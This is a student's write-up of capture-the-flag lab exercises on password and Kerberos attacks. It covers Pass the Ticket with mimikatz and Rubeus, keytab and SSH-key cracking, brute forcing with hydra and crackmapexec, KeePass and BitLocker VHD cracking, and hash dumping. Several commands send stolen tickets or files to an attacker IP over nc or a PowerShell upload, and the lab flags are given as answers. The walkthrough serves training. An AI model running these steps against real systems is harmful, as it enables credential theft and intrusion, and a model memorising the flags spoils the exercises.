Question: Use john's TGT to perform a Pass the Ticket attack and retrieve the
flag from the shared folder \\DC01.inlanefreight.htb\john
Answer: Learn1ng_M0r3_Tr1cks_with_J0hn
Method: from the list of output files obtained in the previous question, the file
that is relevant for our objective is ‘[0;4adfa]-2-0-40e10000-john@krbtgt-
INLANEFREIGHT.HTB.kirbi’.
On mimikatz CLI, we will enter the command:
kerberos::ptt [0;4adfa]-2-0-40e10000-john@krbtgt-
INLANEFREIGHT.HTB.kirbi
and we will get an ok:

Now we should have access to ‘\\DC01.inlanefreight.htb\john’,

Lets confirm with ‘ls’:
ls \\DC01.inlanefreight.htb\john
Here is our flag lets cat it:
cat \\DC01.inlanefreight.htb\john\john.txt

Question: Use john's TGT to perform a Pass the Ticket attack and connect to
the DC01 using PowerShell Remoting. Read the flag from C:\john\john.txt
Answer: P4$$_th3_Tick3T_PSR
Method: proceeding from the end of the last question, we enter to the
powershell:
Enter-PSSession -ComputerName DC01
And now we are connected to DC01

Lets cat the flag:

Question - Optional: Optional: Try to use both tools, Mimikatz and Rubeus, to
perform the attacks without relying on each other. Mark DONE when finish.
Answer: DONE
Method: ok in the section itself I used mimikatz, lets redo the 3 section
questions with Rubeus (for that I restarted the target machine):
Rubeus, like mimikatz – is in ‘C:\tools’.
Lets open there powershell and run:
.\Rubeus.exe dump /nowrap
In here we don’t get the output as files but directly to the terminal:

What we care about is the ‘Base64EncodedTicket’

We will use to to import Ticket, We will proceed with the command:
.\Rubeus.exe ptt /ticket:<Base64EncodedTicket>
*
*

Ticket successfully imported.

Now we may proceed in the same manner as the mimikatz equivalent:
Pass the Ticket (PtT) from Linux:
Question: Connect to the target machine using SSH to the port TCP/2222 and
the provided credentials. Read the flag in David's home directory.
Answer: Gett1ng_Acc3$$_to_LINUX01
Method: First, lets ssh login to the target linux machine, with the provided
credentials to port 2222 – as instructed. We will use the command:
ssh [email protected]@<target-IP> -p 2222
*the provided username for this section is ‘[email protected]’. *
Then – we enter the provided password:

*
*

We are in david’s home directory.

In the following 2 commands, we will confirm flag existence and read it:
ls
cat flag.txt
Question: Which group can connect to LINUX01?
Answer: Linux Admins
Method: first – Linux01 is our target windows machine (the one we had just
ssh connected to in the previous question).
Now, we will run on the linux machine the command:
realm list

And we will find the answer in the last category.

Question: Look for a keytab file that you have read and write access. Submit
the file name as a response.
Answer: carlos.keytab
Method: we will have to look for such keytab file with the command:
find / -name *keytab* -ls 2>/dev/null
the command will look for all files (and directories) which in their name contain
the string ‘keytab’, and the ‘-ls’ serves the same functionality as ‘ls -l’ but in
‘find’ command:

We can observe that ‘carlos.keytab’ has read and write permissions to

everyone, including us.

Question: Extract the hashes from the keytab file you found, crack the
password, log in as the user and submit the flag in the user's home directory.
Answer: C@rl0s_1$_H3r3
Method: first small explanation about keytab from the section:
‘A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are
derived from the Kerberos password).’.

Now for the extraction -we will use the tool ‘KeyTabExtract’, which in the target
machine ‘LINUX01’ is provided for us in ‘/opt’ directory as
‘/opt/keytabextract.py’.
We will run the command:
python3 /opt/keytabextract.py
/opt/specialfiles/carlos.keytab
*where ‘/opt/specialfiles/carlos.keytab’ is the file with the user read&write
pemission found in the previous question. *:
We have carlos’s NTLM hash – lets crack it – usually we crack the password
with hashcat (using some wordlist of rockyou or the password.list from the
resources bag), but this time we will go with the section suggested method -
crackstation online cracking:

When entering the obtained NTLM hash in there – we can see the cleartext
password is ‘Password5’.

Now we can proceed with either

su [email protected]
on ‘LINUX01’ to directly login as ‘[email protected]’:

Or start another ssh session from the pwnbox:

ssh [email protected]@<target-IP> -p 2222
*
*

*the ssh method is more recommended as we login directly to carlos’s home

directory, unlike the su method that will require change directory command
first. *

Either way the next command (from the ssh method) is

cat flag.txt
Question: Check Carlos' crontab, and look for keytabs to which Carlos has
access. Try to get the credentials of the user svc_workstations and use them to
authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
Answer: Mor3_4cce$$_m0r3_Pr1v$
Method: on ‘[email protected]’ user on ‘LINUX01’ host – lets get to his
crontab tasks with the command:
crontab -l

*
*

The tasks means that ‘~/.scripts/Kerberos_script_test.sh’ is being executed

every 5 minutes.
Looking at the script:

The .sh script will attempt to Kerberos authenticate as ‘svc_workstations’ – and

if successful it puts the TGT in a cache (command 1), then – it will attempt to
use the cached TGT to smb connect to dc01, and put the ‘ls’ content in the
‘script-test-results’ file.

Well the sh script makes me wonder what else in the ‘.scripts’ directory:
ls .scripts
So regarding ‘svc_workstations’ – we have ‘svc_workstations.kt’, and
‘svc_workstations._all.kt’ – where ‘kt’ must be ‘keytabs’.
Lets use ‘KeyTabExtract’ on both files:
python3 /opt/keytabextract.py .scripts/svc_workstations.kt

python3 /opt/keytabextract.py
.scripts/svc_workstations._all.kt

The NTLM hash is in ‘svc_workstations._all.kt’

Running it in crackstation:

‘svc_workstations’ password is ‘Password4’

Lets ssh login to his account:
ssh [email protected]@<target-IP> -p 2222

*
*

And we are in.. cat the flag:

Question: Check the sudo privileges of the svc_workstations user and get
access as root. Submit the flag in /root/flag.txt directory as the response.
Answer: Ro0t_Pwn_K3yT4b
Method: lets begin with checking ‘svc_workstations’ sudo rights:
sudo -l
enter ‘svc_workstations’ password at prompt:

We have ‘ALL’ rights, meaning we can do (almost) everything, within the

‘LINUX01’ target machine.
Including using sudo to cat the flag in ‘/root’:
sudo cat /root/flag.txt
Question: Check the /tmp directory and find Julio's Kerberos ticket (ccache
file). Import the ticket and read the contents of julio.txt from the domain share
folder \\DC01\julio.
Answer: JuL1()_SH@re_fl@g
Method: for this step, we will have to move to root user.
Using sudo (which svc_workstations has) – we will run the commands:
sudo su
cd /root

Now, lets run

ls -la /tmp
to see what we have in ‘/tmp’:

It seems there are 2 tickets which are belong to ‘julio’, (I don’t know why there
are 2, either way we pick the bottom one (the one which ends with ‘wr’).
*The bottom value constantly changes while the top one whose suffix is ‘Dux’ is
constant. The constant one will not work, only the bottom one, why? I don’t
know. But we go on with that. *

Lets copy the file to ‘/root’, then export it to ‘KRB5CCNAME’ environment

variable (the one used for Kerberos authentication), we will use the commands:
cp /tmp/krb5cc_647401106_OLAzwr .
export KRB5CCNAME=/root/krb5cc_647401106_OLAzwr
Then we can confirm export with
klist

now lets run smb using our stored keytab, we will use the command:
smbclient //dc01/julio -k -c ls -no-pass
running ls on dc01/julio home directory, as instructed in the question

Lets get julio.txt – we will use ‘get’ to get the flag from DC01/julio to ‘LINUX01’
(root directory):
smbclient //dc01/julio -k -c 'get julio.txt' -no-pass

Now the flag is in ‘LINUX01’ (‘/root’ directory).

Lets get the flag’s name with ls – then when we know what it is – we cat it:
ls

The flag is ‘julio.txt’ – lets cat it:

Question: Use the LINUX01$ Kerberos ticket to read the flag found in
\\DC01\linux01. Submit the contents as your response (the flag starts with
Us1nG_).
Answer: Us1nG_KeyTab_Like_@_PRO
Method: first lets try to get it with julio kerberos ticket with the command:
smbclient //dc01/linux01 -k -c 'ls' -no-pass

Access denied.
We have to find a keytab file of ‘linux01’ and use it to connect to linux01 share.
But where is this keytab file?
We will have to use the tool ‘Linikatz’ – a similar Mimikatz but to unix.
We will download it to the pwnbox, and then with temporary python server we
will transfer it to the target ‘LINUX01’ machine.
On pwnbox we will run
python -m http.server 8080

and on client ‘LINUX01’ we will run

wget http://<attacker-IP>:8080/linikatz.sh -outfile
linikatz.sh

when downloaded, we will confirm download on the target machine:

*remember that we are still on root from last question. *

Lets enable execution permission
chmod u+x linikatz.sh
*we can confirm we have permissions with ‘ls -l linikatz.sh’
Then we can run. Running without filters will flood the terminal with output
that will not be relevant, so we will run with the command:
./linikatz.sh | grep linux01 -i -B 1
‘-i’ is for insensitive casing between big letters and small letters, and ‘-B1’ is to
print the line with the keyword ‘linux01’, and the line above it (soon we will see
why):

Here we have the ‘LINUX01’, and line above it the file full path location.
Lets assign the found path to the ‘KRB5CCNAME’ environment variable:
export KRB5CCNAME=/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
lets confirm with ‘klist’:

Now lets try to run again:

smbclient //dc01/linux01 -k -c 'ls' -no-pass

Lets get the flag, confirm it with ‘ls’ and ‘cat’ it:
smbclient //dc01/linux01 -k -c 'get flag.txt' -no-pass

Then we run ‘ls’:

*the smb download of ‘flag.txt’ overwritten the previous original ’flag.txt’ that
were in ‘/root’. *

And
cat flag.txt

*ignore those 2 ‘??’ symbols. *

Question - Optional: Transfer Julio's ccache file from LINUX01 to your attack
host. Follow the example to use chisel and proxychains to connect via evil-
winrm from your attack host to MS01 and DC01. Mark DONE when finished.
Answer: DONE
Method: we will have to transfer Julio's ccache file from Linux01 to the
pwnbox.
We will use nc for that:
Receiver (run on attacking pwnbox):
nc -l -p 4444 > received

Sender:
nc <attacker-IP> 4444 < /tmp/krb5cc_647401106_NzSbv5

when the file is transferred, we will have Julio’s ccache file (‘received’) in the
pwnbox.

Now lets make the necessary pivoting modifications to allow the pwnbox to
directly reach to MS01 and DC01 machines (which are currently reachable from
‘LINUX01’ only).
On ‘LINUX01) lets run:
nslookup ms01
nslookup dc01
ms01 IP - 172.16.1.5, dc01 IP – 172.16.1.10
On pwnbox – lets run:
sudo nano /etc/hosts
to assign the IP’s to the hosts,
we will paste in it:
172.16.1.10 inlanefreight.htb inlanefreight
dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01

*** TO BE COMPLETED***

Question - Optional: From Windows (MS01), export Julio's ticket using

Mimikatz or Rubeus. Convert the ticket to ccache and use it from Linux to
connect to the C disk. Mark DONE when finished.
Answer: DONE
Method: *** TO BE COMPLETED***
Cracking Files
Protected Files:
Question: Use the cracked password of the user Kira and log in to the host and
crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the
answer.
Answer: L0veme
Method: in this section we are not told what machine we are dealing with.
Lets run ‘nmap’ on the target machine:
nmap <target-IP> -sV -p 1-7500

We are dealing with a linux machine, running among others ssh.

Now, we are told to use kira credentials, those that were obtained in the
section ‘Credential Hunting in Linux’, and back then were used to ssh login to
the machine, so it makes sense to ssh login to the target machine.
The credentials are ‘kira:L0vey0u1!’, lets ssh login to the target Linux machine
with the command:
ssh kira@<target-IP>
and then enter the password.
*
*

We are in.
Now we have to look for the ‘id_rsa’ ssh key. Traditionally – the key is stored in
‘~/.ssh/id_rsa’ in linux machine – lets check that:

There it is, lets get to the attacking pwnbox for cracking.

We copy the content of the ‘id_rsa’, and put it in a file within the pwnbox called
‘ssh_private_key’

Now, we will use a tool called ‘ssh2john’ which takes in a private key – and
generates the corresponding hashes for encrypted SSH keys, which we can then
store in files, ready to be cracked. We will use the command:
ssh2john.py ssh_private_key > ssh_private_key.hash
to get the corresponding hashes and output them to a file called
‘ssh_private_key.hash’:

Now lets use ‘john the ripper’ to crack the hashes, along with rockyou wordlist
We will run the command:
john --wordlist=rockyou.txt ssh_private_key.hash

The password is ‘L0veme’

Protected Archives:
Question: Use the cracked password of the user Kira, log in to the host, and
read the Notes.zip file containing the flag. Then, submit the flag as the answer.
Answer: HTB{ocnc7r4io8ucsj8eujcm}
Method: lets ssh login to kira user (‘kira:L0vey0u1!’) in the same manner
logged as the previous question (I skip here the nmap, ssh and all that, refer to
the previous section for that).
We will have to find Notes.zip in the target machine, we will run the command:
find / -name Notes.zip 2>/dev/null
the fill will be found in kira’s Documents:

For convenience, I copied the file from Documents for kira’s home directory
cp Documents/Notes.zip Notes.zip

We will have to transfer the file from the target machine to the attacking
pwnbox for further analysis.
Luckily we have python3 on the target machine, so lets set up temporary
python server on the target machine:
python3 -m http.server 8080

and while the server is running - on client (pwnbox), we run the command:
wget http://<target-IP>:8080/Notes.zip -outfile Notes.zip
when downloaded, we can confirm download with ‘ls Notes.zip’:
Now, we will use the tool ‘zip2john’ to get the corresponding hashes of the zip,
we will use the command:
zip2john Notes.zip > Notes.hash
to get the hashes to the output file ‘Notes.hash’

before we crack, we will need a passwordlist, lets get the passwords from the
resources folder, and generate the mutated password list with the command:
hashcat --force password.list -r custom.rule --stdout | sort
-u > mut_password.list
it is the same procedure done before regarding the mutated passwords list.

Once that we have that, we may start cracking using ‘john the ripper’, using the
command:
john --wordlist=mut_password.list Notes.hash

And the password is successfully obtained. Now we can unzip ‘Notes.zip’:

We enter the obtained password:

And all we have to do now is cat notes.txt:

Skills Assessment
Password Attacks Lab - Easy:
Question: Examine the first target and submit the root password as the answer.
Answer: dgb6fzm0ynk@AME9pqu
Method: first lets nmap scan the target machine:
nmap <target-IP> -sV -p 1-7500

We are dealing with a Linux machine running ftp and ssh.

We don’t have any credentials for login, so lets try to obtain some.
Lets try to bruteforce the ftp service with the resources folder usernames and
passwords. We will use the command:
hydra -L username.list -P password.list ftp://<target-IP> -t
48
After approximately 20 minutes of bruteforcing, we get a credential for the ftp
service – ‘mike:7777777’.
Attempting to ssh enter with the credentials that were found:

It tells us we need a public key, this ssh service will not accept passwords.
So lets get a public key.
Lets ftp (which stands for File Transfer Protocol) with his account, we will use
the commands:
ftp -n <target-IP>
user mike
then we enter his password:

And we are in, and we are presented with the ftp CLI.
Lets enter
ls
in it:

There are 3 files – authorized_keys, id_rsa, id_rsa.pub

‘authorized_keys’ is about who can login. ‘id_rsa’ is the user’s (mike) ssh
private key. ‘Id_rsa.pub’ is the public key.
The shh public key authentication method will not be covered here, for further
information about that – go here.
For our purpose we need the private key ‘id_rsa’.
We will get it to our attacking pwnbox with the ftp command:
get id_rsa

Lets confirm download with ‘ls’:

Ok we have the key, lets use that to ssh connect to mike user. we will use the
command:
ssh -i ./id_rsa mike@<target-IP>

And access denied due to file permissions are too open, it tells us that the
permissions are ‘0644’, which means non-owner can read the file.
We will have to modify that to ‘0600’ – denying non owner (which include
group users, and every other general user on the system) the ability to read
this file. We will do that with the command:
chmod 600 ./id_rsa
we can confirm the current permissions status in NUMERICAL FORMAT with
the command:
stat -c "%a" id_rsa

600 means non owner can not read (or do anything) the file.
For further info about Linux file permissions, click here.
Lets try to ssh connect again to mike’s user:

*
*

Linux user’s home directory should have the hidden file ‘.bash_history’, lets run
‘ls -a’ (‘-a’ is for show hidden files as well) to confirm:

Here it is, this file contains all past commands executed by ‘mike’, lets
investigate that file for any root related commands, we will use the command:
cat .bash_history | grep root
and the root’s password is right here:
Password Attacks Lab - Medium:
Question: Examine the second target and submit the contents of flag.txt in
/root/ as the answer.
Answer: HTB{PeopleReuse_PWsEverywhere!}
Method: first lets nmap scan the target machine:
nmap <target-IP> -sV -p 1-7500

Our target is running ssh and smb.

Lets try to bruteforce the smb service in the same metasploit method used in
‘Network Services’ section:
we will execute Metasploit with:
msfconsole
command, then we will enter the settings:
use auxiliary/scanner/smb/smb_login
set user_file username.list
set pass_file password.list
set rhosts <target-IP>
using the username.list and password.list from resources folder.
Very quickly we observe that the password ‘123456’ seems for be working for
virtually every username. Lets try to get smb access with the credentials
‘root:123456’. We will use the command:
crackmapexec smb <target-IP> -u "root" -p "123456" --shares

*
*

So, we are logged as Guests, and have read access to ‘SHAREDRIVE’, lets take a
look – we will take a look at ‘SHAREDRIVE’ with the command:
smbclient -U root \\\\<target-IP>\\SHAREDRIVE
we are now logged in and have the smb CLI, lets see what we have with ‘ls’:

We have ‘Docs.zip’ available for us, let’s get it with:

get Docs.zip
now we should have the file at the pwnbox, lets ‘ls’ to confirm:

When attempting to unzip it:

We are required to enter password, which we currently do not have.

Let’s prepare the zip to be cracked in the same method used in ‘Protected
Archives’ section:
We will get the corresponding hashes of the zip with ‘zip2john’:
zip2john Docs.zip > Docs.hash

we will generate the mutated password list required for the cracking:
hashcat --force password.list -r custom.rule --stdout | sort
-u > mut_password.list

and begin cracking

john --wordlist=mut_password.list Docs.hash

Cracking successful, we have the zip’s password – ‘Destiny2022!’

Now that we have the password - lets unzip Docs.zip:

We have a file ‘Documentation.docx’ (a Microsoft word format).

The Linux tool that can open .docx file is ‘libreoffice’. Lets try to open the docx
file with the command:
libreoffice Documentation.docx
and.. we are required to enter password:

Any of the passwords obtained so far will not work.

We will have to crack it, we will use the tool ‘office2john’ (which is similar to
the previous ‘zip2john’ and ‘ssh2john’ tools) (it is also built in the pwnbox (you
can always confirm with ‘which office2john.py’)).
And we will use the mut_password.list.
The commands we will run are:
office2john.py Documentation.docx > docx.hash
john --wordlist=mut_password.list docx.hash
*the commands work similarly to the previous tools. *:
The Documentation.docx password is ‘987654321’.
And the Documentation.docx is now open:

Some pages down, they were kind enough to write root’s password:

Now, ssh connecting as root will ask for public key

But we can use the credentials ‘jason:C4mNKjAtL2dydsYa6’ to connect to ssh

connect to jason:

*
*
Looking at /home directory we can observe that there is another user called
‘dennis’ on the machine.
Investigating further in the Documentation.docx:

In the last page of the document, it states that mysql database should already
be setup. Let’s investigate it in the same manner investigated in ‘Password
Reuse / Default Passwords’ section.
We will login to mysql with ‘jason’ credentials and the command:
mysql -u jason -pC4mNKjAtL2dydsYa6
*make sure to login from jason ssh session on the target machine. *

We are now on the mysql with its CLI - Lets see what databases are there:
show databases;
The ‘users’ database looks interesting, we will choose and ask for tables display
within ‘users’ database:
use users;
show tables;

It has a single table of ‘creds’ which is abbreviation of ‘credentials’.

lets select all the data in it:
select * from creds;

*
*

Here is dennis credentials: ‘dennis:7AUgWWQEiMPdqx’

Lets ssh connect to ‘dennis’:

***
Lets investigate dennis home directory with ‘ls -a’:
ls -a
*don’t bother with attempting to use ‘sudo’, dennis also doesn’t has sudo
rights. *

‘.ssh’ directory looks interesting:

And once again we have the trio of ‘authorized_keys’, ‘id_rsa’, ‘id_rsa.pub’.

Let’s get ‘id_rsa’ (the private key) to the attacking pwnbox:
We will cd our way to ‘.ssh’, and set up temporary python server there:
python3 -m http.server 8080

And on client – the attacking pwnbox we will download the id_rsa with the
command:
wget http://<target-IP>:8080/id_rsa
And we can confirm download with ‘ls id_rsa’:

Ok we have the ‘id_rsa’ private key in the pwnbox, we will set its permissions to
600 like last time to prevent non-owner read of the file
chmod 600 id_rsa
And now lets connect to root:
ssh -i ./id_rsa root@<target-IP>

We need a passphrase….

Well we will obtain it in the same manner it was obtained in ‘Protected Files’
section.
This is where the question’s hint comes into play, and we will download from
here the tool ‘ssh2john’, the same tool used in ‘Protected Files’. (using the
pwnbox firefox browser, or wget, doesn’t matter)
When the ‘ssh2john’ is downloaded - we run the sequence of commands:
ssh2john.py id_rsa > id_rsa.hash
john --wordlist=mut_password.list id_rsa.hash
like in the ‘Protected Files’ section – we get the corresponding hash of the file,
and then we use john to crack it, using the mutated passwords list:
And we have a passphrase – ‘P@ssw0rd12020!’.
Lets ssh login again to root, using the ‘id_rsa’ private key and the obtained
passphrase:

*
*

We are in as root!
Lets run ‘ls’:

And cat the flag:

Password Attacks Lab - Hard:
Question: Examine the third target and submit the contents of flag.txt in
C:\Users\Administrator\Desktop\ as the answer.
Answer: HTB{PWcr4ck1ngokokok}
Method: first lets nmap scan the target machine:
nmap <target-IP> -sV -p 1-10000

There are several services that runs on the machine, SMB is one them – lets try
to brute force that.
On the section details we were implied to use a username or a variation of the
username ‘Johanna’. We will arrange a proper username list based on
‘Johanna’ with the same method used in ‘Attacking Active Directory &
NTDS.dit’ section, using ‘Username Anarchy’.
When the tool downloaded and unzipped - we will run the commands:
echo Johanna > names.txt

./username-anarchy-master/username-anarchy -i names.txt >

usernames.txt
We can also cat names.txt to confirm the list before the username mutation
command.
Now we will download the resources folder, and get the usual mutated wordlist
hashcat --force password.list -r custom.rule --stdout | sort
-u > mut_password.list
we will be using mut_password.list throughout the solution.

when both lists are ready, lets start with SMB brute forcing. We can use
Metasploit, or crackmapexec, lets use the later:
we will use the command:
crackmapexec smb <target-IP> -u usernames.txt -p
mut_password.list | grep '+'
and after several moment we will get credentials!

The credentials of johanna are ‘johanna:1231234!’.

Now, looking at what smb shares johanna can inspect:
crackmapexec smb <target-IP> -u "johanna" -p "1231234!" --
shares

smbclient -U johanna \\\\<target-IP>\\IPC$

Will reveal that the only share johanna can look is ‘IPC$’, and there is nothing
there and it’s a dead-end.
Ok lets try another service – we have RDP in the target windows machine, lets
try to login with the command:
xfreerdp /v:<target-IP> /u:johanna /p:1231234! /dynamic-
resolution
and we are in:

Lets open the file explorer:

We can immediately notice the ‘Logins.kbdx’ file on the quick access, located in
‘C:\Users\johanna\Documents’ folder (it’s the same ‘This PC\Documents’).
This ‘.kdbx’ is a ‘KeePass’ file, a password manager application which securely
stores user’s passwords (in an encrypted manner) of course) – lets try to open
it:
We are requested to enter a Master key, lets try the ‘1231234!’password:

We will have to find a way to crack it – we will use the tool keepass2john (do
NOT download it yet).
Before we proceed with it, let’s read some of its commented part:

It seems the tool support cracking for password database storage version 1.X.
Lets confirm the version of KeePass in johana user is compatible – when closing
the ‘master key is invalid’ box, we will be opened with a blank version of the
KeePass interface:
Go to Help → About KeePass

The line we care about is the last one – it says 1.X, which means compatible
*Note – while the versions seem to be inline, I am no expert in KeePass
versioning, maybe even if the versions weren’t fully compatible, the coming
steps are still worth to try. *

Now before we proceed with the keepass2john tool – the tool in the link above
is fit for python2, it will not work with python3, so I’ve modified the tool to fit
python3, download the modified tool to the pwnbox (or any other attacking
machine) from here (that’s why you were instructed to not download the
original tool).
The default name of the modified tool I gave is ‘keepass2john_3.py’, so upon
downloading, confirm file with ls:

Now that the tool is ready, we need to get ‘Logins.kbdx’ to the pwnbox. Using
the smb share method like in previous section will not work:

There seems to be security policy preventing up to uploading files to the smb

share. Maybe that can be bypassed, I don’t know, I didn’t check.
Instead, we will use a method I used in other Modules – crude python server.
That server python script that I made, while very basic in design, it can handle
files uploads from the target machine.
Lets download it to the pwnbox, (its default name is
‘python_server_advanced.py’), when downloaded – we can confirm with ‘ls’:

Now lets start the server - Lets run it with the command:
python3 python_server_advanced.py
and we will see the serving on port 8080 message:

While the server is listening, on the target machine, we will open powershell
on the ‘C:\Users\johanna\Documents’ folder, and run the (also crude)
powershell upload script:
$filePath = ".\Logins.kdbx"
$targetUrl = "http://<attacker-IP>:8080/upload"
# Create a WebClient object
$webClient = New-Object System.Net.WebClient
$webClient.Headers.Add("filename",
[System.IO.Path]::GetFileName($filePath))
$WebClient.Headers.Add("Authorization", "Basic " + $AuthStr)
$WebClient.Headers.Add("X-Atlassian-Token", "nocheck")
# Upload the file
$WebClient.UploadFile($targetUrl, (Get-Location).Path + "\"
+ $filePath)
Write-Output "File uploaded successfully"
*make sure to change the <attacker-IP> to the pwnbox or other attacker IP. *

After some numbers going..

When the file is uploaded, we will get 200 code on the server:

It means that ‘Logins.kdbx’ was successfully uploaded to the pwnbox.

Lets confirm:
Now that we have both the modified ‘keepass2john_3.py’ and ‘Logins.kdbx’ –
lets start the cracking in a similar manner to the others ‘xx2john’ tools, we will
use the commands:
python3 keepass2john_3.py Logins.kdbx > Logins.hash
john --wordlist=mut_password.list Logins.hash
using the usual ‘mut_password.list’ as passwords list, the cracking will take few
minutes, in the end of which:

The master key is ‘Qwerty7!’ – lets reopen the Logins.kdbx:

And we are in!

We can see the username ‘david’ (which simple exploring on the target
machine will reveal he is also a user on the machine), and a hidden password.
To reveal the password, we right click on the entry, and select ‘Edit Entry’:
And we are opened with an ‘Edit Entry’ Window:

Lets clock on that button with 3 dots to show the password:

david’s credentials are: ‘david:gRzX7YbeTcDG7’.

Attempting to login with the credentials to RDP or WinRM will result in
authentication error/access denied:
evil-winrm -i <target-IP> -u david -p gRzX7YbeTcDG7

xfreerdp /v:<target-IP> /u:david /p:gRzX7YbeTcDG7 /dynamic-

resolution
Access denied for both..
Lets try smb connect – first lets take a look at the shares:
crackmapexec smb <target-IP> -u "david" -p "gRzX7YbeTcDG7" -
-shares

We have read access to ‘david’ share (which johanna hasn’t) – lets enter it and
see what we’ve got:
smbclient -U david \\\\<target-IP>\\david

After password entry and ‘ls’ – ‘david’s share has ‘Backup.vhd’ file.
Lets get it to the pwnbox:
It is kinda heavy:
du -h -apparent-size Backup.vhd

this is a vhd file on the pwnbox – Virtual Hard Disk which size is 131 MB.
For the coming step this guide is very helpful!
We will mount the Backup.vhd on our pwnbox.
First we will need to install ‘libguestfs-tools’:
sudo apt-get update
sudo apt-get install libguestfs-tools
*installation will take approximately 2-3 minutes. *

Then we will run the command:

sudo fdisk -l /dev/nbd0
to make sure there isn’t anything on ‘/dev/nbd0’:

Good there isn’t! (if there is – disconnect it with ‘sudo qemu-nbd -d /dev/nbd0’
or replace 0 with another number like ‘nbd1’ or ‘nbd2’)

Lets get mount Backup.vhd on nbd0

sudo modprobe nbd
sudo qemu-nbd -c /dev/nbd0 --format=vpc Backup.vhd
Here is some explanation about ‘modprobe’:

And ‘qemu-nbd’:
Lets run
sudo fdisk -l /dev/nbd0
again to confirm mount:

Here is our stuff, on 2 sub-petitions, we will target the second one – nbd0p2.
We will run the command
sudo cryptsetup bitlkOpen /dev/nbd0p2 <label>
*in this write up* - the label will be ‘decrypted_vhd’*:

We need a passphrase.
We will bruteforce the passphrase with this bash script I made, that bruteforce
the passphrase request using the ‘mut_password.list’
*Note – A. make sure the ‘mut_password.list’ is present at the same directory,
both the password list and the label are hardcoded within the script.
B. also the dev ‘nbd0p2’ is hard coded in the script. *

**also – the traditional way involves obtaining the corresponding hash of the
vhd but I didn’t succeed with that so I resorted to this method, which works!
If anyone succeed with the hash method is welcome to let me know
([email protected]) **
Anyway, the default script name is ‘vdi_cracker.sh’ - lets enable execution
permissions and run:
chmod u+x vdi_cracker.sh
./ vdi_cracker.sh
*don’t forget to have the ‘mut_password.list’ in the same folder, and other
relevant hardcoded objects mentioned above. *
**note – if the file run is getting:

Error: run
dos2unix vdi_cracker.sh
(install ‘sudo apt-get install dos2unix’ if required!)

It should fix the problem. **

Anyway lets run:

After 10+- minutes of runtime The vhd password is ‘123456789!’.

Now that we know the Backup.vhd password – we can decrypt it and mount it.
We will proceed to run the sequence of commands:
sudo cryptsetup bitlkOpen /dev/nbd0p2 decrypted_vhd
enter the passphrase that we had just discovered:
Then:
sudo mkdir -p /mnt/decrypted_vhd
sudo mount /dev/mapper/decrypted_vhd /mnt/decrypted_vhd
*-p flag is to create parent directories if necessary. *
at this point we should have the decrypt content of the virtual hard disk in
‘mnt/decrypted_vhd’, we will proceed with:
cd /mnt/decrypted_vhd
ls -la
to change our pwd to the decrypted vhd, and view its content (remember: ‘-la’
is for view in details about the files (‘-l’), including hidden files (‘-a’)):

We can observe the files SAM and SYSTEM, files that are required to extract
hash credentials of users.

For convenience, lets copy them to the home directory first (‘~’):
cp SAM ~
cp SYSTEM ~

Here they are on the home’s directory:

Lets use secretsdump to extract the hashes:
python3 /usr/share/doc/python3-
impacket/examples/secretsdump.py -sam SAM -system SYSTEM
LOCAL

The Administrator NTLM hash is the marked hashed in the screenshot above –
lets crack it, lets put the hash within a file called ‘hash.txt’:

We will use the usual ‘mut_password.list’ as our word list, and the usual
hashcat command and NTLM flag of ‘-m 1000’:
sudo hashcat -m 1000 hash.txt mut_password.list

The Administrator’s password is ‘Liverp00l8!’

Lets RDP login to the Administrator:
xfreerdp /v:<target-IP> /u:Administrator /p:Liverp00l8!
/dynamic-resolution

Here is our flag!